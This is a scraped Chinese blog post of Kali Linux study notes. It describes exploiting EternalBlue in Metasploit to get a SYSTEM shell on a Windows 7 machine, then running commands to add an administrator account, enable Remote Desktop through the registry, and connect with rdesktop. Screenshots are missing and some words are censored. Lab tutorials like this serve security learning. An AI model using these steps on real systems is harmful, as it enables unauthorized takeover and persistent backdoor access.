1. 程式人生 > >kali系統——網絡安全v6筆記總結(四)

kali系統——網絡安全v6筆記總結(四)

輸入 tco com -o bcb 用戶 b2c img 結束

利用永恒之藍漏洞實現w7遠程操控
首先目標要關閉防火墻
技術分享圖片
技術分享圖片
技術分享圖片
然後打開Metasploit
技術分享圖片
輸入永恒之藍漏洞編碼
技術分享圖片
復制運行第二條輔助項目
技術分享圖片
設置漏洞選項
技術分享圖片
運行項目,結果為有一個可能是漏洞的w7漏洞
技術分享圖片
然後選擇第三個項目,即***項目,並設置漏洞選項
技術分享圖片
技術分享圖片
輸入漏洞***命令 exploit
技術分享圖片
於是我們便進入了對方的w7命令終端,身份為最高權限者system(系統)
技術分享圖片
下一步我們輸入命令net user 用戶名 密碼 /add來創建一個用戶
然後用一個 net localgroup administrators 用戶名 /add 命令來將剛才的用戶拉入討論組
然後輸入命令 net localgroup administrators 查看管理員

輸入命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 來開啟遠程桌面端口3389

/v 所選項之下要添加的值名。
/t RegKey 數據類型
/d 要分配給添加的註冊表 ValueName 的數據。
/f 不用提示就強行覆蓋現有註冊表項。
現在我們就可以利用其他漏洞進行以遠程桌面控制為渠道的******了

sessions -l 列出會話
sessions -i <id>選擇會話

sessions -k <id> 結束會話
<ctrl> z 把會話放在後臺
<ctrl> c 結束會話

kali終端窗口
rdesktop 192.168.4.239:3389 遠程連接命令

kali系統——網絡安全v6筆記總結(四)